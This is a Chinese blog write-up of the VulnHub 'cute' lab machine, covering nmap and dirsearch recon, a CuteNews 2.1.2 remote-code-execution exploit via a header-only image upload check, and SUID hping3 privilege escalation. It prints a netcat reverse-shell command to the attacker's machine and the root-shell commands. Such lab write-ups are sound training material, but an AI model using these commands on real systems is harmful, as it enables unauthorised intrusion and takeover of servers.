cute 靶机wp

最新推荐文章于 2024-09-17 19:54:08 发布
最新推荐文章于 2024-09-17 19:54:08 发布
阅读量337 收藏
点赞数
文章标签: 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_52496313/article/details/127149575
版权

主机探活

nmap -sP 192.168.159.1/24

目标靶机IP为:192.168.159.178


端口扫描

nmap -sV -p- -A 192.168.159.178

在这里插入图片描述

目标主机开放端口为:22、80、88、110、995端口


80端口

目录扫描
dirsearch -u http://192.168.159.178

在这里插入图片描述


找到一些路径,在README.md中发现是一个CMS,且知道版本号

在这里插入图片描述


本地漏洞库查询后发现存在文件上传漏洞

在这里插入图片描述


根据脚本提示操作

在这里插入图片描述


cms之文件上传

http://192.168.159.178/index.php

首先注册用户

在这里插入图片描述

但是在注册时验证码在页面上是看不见的。。。

于是我翻了网页源码,找到了它生成验证码的地方

在这里插入图片描述


访问后会获得一个验证码,填入即可成功注册用户

在这里插入图片描述

在这里插入图片描述

然后根据脚本内容,访问相应网址

http://www.target.com/cutenews/index.php?mod=main&opt=personal

将我们的反弹shell脚本后缀名改为 jpg,上传,抓包,修改相应内容(就是按照脚本信息做)

在这里插入图片描述

在这里插入图片描述


但是报错了。。。

在这里插入图片描述


2.1.2版本

然后我只能换想法,到处点,然后猛然发现,README骗我。。。这tm版本是2.1.2.。。

在这里插入图片描述

重新在漏洞库一搜,发现远程代码执行

在这里插入图片描述


修改这个脚本,把对应的路径改了,所有路径的CuteNews都得删掉

在这里插入图片描述

在这里插入图片描述


直接执行脚本

在这里插入图片描述


成功获得shell

在这里插入图片描述

这个脚本其实也是通过文件上传做的,但是它的绕过方式是图片马,这台靶机的图片上传验证只验证文件的文件头,不验证后缀,所以在php文件的开头加上图片的特征就能绕过了(或者在图片末尾加php代码,再把后缀改回php)

在这里插入图片描述


提权

setuid
find / -perm -u=s -type f 2>/dev/null

在这里插入图片描述

直接发现存在 hping3,去网站查找,找到相关提权命令

/usr/sbin/hping3
/bin/sh -p

但是运行的时候发现不太对,估计是shell问题,切换shell

nc 192.168.159.131 7777 -e /bin/bash

在这里插入图片描述

在这里插入图片描述


重新提权,这个shell也不行,换成python

python -c 'import pty;pty.spawn("/bin/bash")'

在这里插入图片描述

成功获取 root 权限

yq_00
关注
shenron-3 靶机wp
m0_52496313的博客
09-14 568
shenron-3 靶机wp
katana 靶机 wp
m0_52496313的博客
10-16 723
katana 靶机 wp
靶机 Cute
m0_66299232的博客
09-27 1282
再使用finf命令 find /-perm -4000 2>/dev/null 看下有没有惊喜。3.输入网址后 频频报错 发现这个python脚本多了一个/CuteNews 将他替换掉。4.发现一个hping3 拿来提权 usr/sbin/hping3 /bin/sh -p。5.访问网址,发现是一个cutenews的一个管理系统,并且有版本号。4.再次利用脚本得到一个可以执行命令的界面(可以说是个后台)1.反弹成功,在home目录下,发现一个fox用户。虚拟机网络链接模式:桥接模式。
vulnhub:Cute-v1.0.2靶机
qq_43884092的博客
01-10 159
searchsploit搜索该cms漏洞。靶机:192.168.111.147。README.md发现该cms版本。删除所有/CuteNews路径。执行该python脚本。
OSCP靶机练习--CuteNews02
一杯咖啡的渗透记忆
05-20 1060
2. POC脚本修改 POC的脚本通常是通用脚本,很多时候是不满足具体的环境要求的,所以打开这个python脚本,可以看到跟我们的目前的环境路径不一致,多了一个/CuteNews/这个文件路径,将代码包含有这个路径的代码都去掉。然后再整体check一下。这边POC里面的payload我是没有做任何修改的,里面的payload你们也可以根据自己的需求和喜欢来进行修改。 ...
OSCP靶机练习--CuteNews01
一杯咖啡的渗透记忆
05-19 1689
靶机地址:BBS (cute): 1.0.2 ~ VulnHub 靶机环境搭建: 个人本地环境:VMWare已经安装好了,因为虚拟机镜像是virtualBox的.vbox结尾,所以在本地又安装了VitualBox VMWare和VitualBox的NAT网络不能同时使用, 整了半天也没搞起来,后来才知道这两种虚拟程序不能同时使用NAT。 所以使用了另外一台Kali的机器,直接用主机来测了。靶机本地用VirtualBox安装靶机。 但因为不在同一台机器上面,所以才用的是桥接的方式链接,如下:
vulnhub-BBS(cute)1.0.1
qq_41810304的博客
09-26 526
前言: 很长时间没有做过靶机了,现在又跑回来做一做。确切的说本人就是菜鸡本菜了,因为困难靶机做不了,中等靶机有难度,简单靶机又嫌弃,想来多少有些可笑,总想去提升,却总感觉在原地踏步。看了一些推荐,我又跑去xctf攻防世界注册了个账号刷刷ctf题,确实发现了很多知识盲区,也知道有很多东西要学,却又不知道如何学起。书中的来终觉浅,又缺乏实践,现在我呀,就像一个无头的苍蝇到处瞎撞。 好了,言归正传,这次靶机名称见题目,下载链接就不放了。文中内容仅供学习。 kali:192.16...
Kioptrix Level 1 靶机wp
m0_52496313的博客
08-10 1049
Kioptrix Level 1 靶机wp
Tempus-Fugit 靶机 wp
m0_52496313的博客
11-16 989
Tempus-Fugit 靶机 wp
mycmsms靶机wp
m0_52496313的博客
08-04 868
mycmsms靶机wp
VULNHUB之BBS (cute): 1.0.1
鲨鱼辣椒的博客
07-25 428
好久没写文章了,开始是学期末比较忙,后来放假了说实话有点懈怠也比较迷茫。感觉自己要学的东西很多却又不知道该从哪里下手。写文章就暂时放下了,最近整理了一下自己,文章还是要写,仅作为自己慢慢成长路上的一个记录也好。好了,不多说开始今天的练习 信息搜集 扫描网段发现目标主机IP地址 扫描IP地址发现开启的服务以及端口 发现开启的服务寻找漏洞 SSH 看见ssh第一反应就是暴力破解但是也不能盲目,后面有http可以在web页面上看是否能搜集到一些账号相关的敏感信息可以大大加强我们成功爆破的概率(
vulnhub-BBS (CUTE): 1.0.1-cute
yutianovo的博客
09-25 619
http://blog.yutian233.xyz/index.php/archives/63/ 靶机描述 Machine name: BBS (Bulletin Board System) Level: Easy->Intermediate flags: user, root Description: really technical machine, if you are ready for certifications it will be a good tool to test your
时间&安全精细化管理平台存在未授权访问漏洞
2301_77012231的博客
09-14 377
登录--时间&安全精细化管理平台存在未授权访问漏洞导致与员工信息泄露。
【农信网-注册/登录安全分析报告】
09-16 1011
北京农信互联科技集团有限公司是一家农业互联网高科技企业,以“用互联网改变农业”为使命,致力于构建最有影响力的农业数智生态平台,推动中国农业数字化转型升级。作为农业互联网领域的“独角兽”企业, 技术实力也应该不错,但采用的还是老一代的图形验证码已经落伍了, 用户体验一般,容易被破解, 一旦被国际黑客发起攻击,将会对老百姓形成骚扰,影响声誉。很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。比如:“需求这么赶,当然是先实现功能啊”,“业务量很小啦,系统就这么点人用,不怕的。
Java代码审计篇 | ofcms系统审计思路讲解 - 篇4 | XXE漏洞审计
哦 卷!
09-14 874
我发现很多文章包括教程,大概套路是:只说有漏洞的点,将有漏洞的点指出,然后分析代码;或者黑盒测试出漏洞之后,然后分析代码。我认为这是在分析漏洞代码,而非代码审计。代码审计文章或教程应该是从0开始找到漏洞所在,包括思路!所以这里不管有没有漏洞,我都会把审计过程写出来,因此篇幅会很长,但我认为这样对你会很有帮助。知其然亦知所以然。XXE漏洞审计Java代码审计篇 | ofcms系统审计思路讲解 - 篇1 | 环境搭建、路由机制。
远程跨境传输大文件如何做到安全又稳定?
镭速的博客
09-14 638
在当今全球化的商业环境中,企业跨境传输大文件的需求日益增长。这不仅涉及到数据的快速迁移,还包括了安全性、稳定性和合规性等多重挑战。本文将探讨企业在跨境传输大文件时可能遇到的问题,以及在传输过程中应注意的事项,并重点介绍镭速在方面的优势。
对称密码中的密钥是如何实现安全配送的?
最新发布
所有成功的背后,都是痛苦的坚持,所有的痛苦,都是傻瓜般的不放弃!
09-17 531
密钥配送问题是指在对称密码算法中,加密和解密使用同一个密钥,发送方必须设法将密钥安全地发送给接收方,而不会被第三方窃听者截获。如果密钥被窃取,那么加密的数据也会被破解,因此密钥的安全配送成为对称密码算法的一个关键问题。为了解决这个问题,密码学领域发展出了多种策略和解决方案。通过通信双方事先共享密钥密钥来解决通过密钥分配中心(KDC)来解决通过密钥交换Diffie-Hellman(DH)来解决通过公钥密码来解决。
信刻光盘安全隔离与信息交换系统
cdprinter的博客
09-11 441
信刻按需研制的光盘安全隔离与信息交换系统,应用不同等级网络之间进行可靠、高效的安全数据交换,实现A网-B网,B网-A网双向摆渡。集数据自动摆渡、用户管理、日志管理、加密及杀毒、数据检查与过滤、校验、安全审计等功能于一体。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值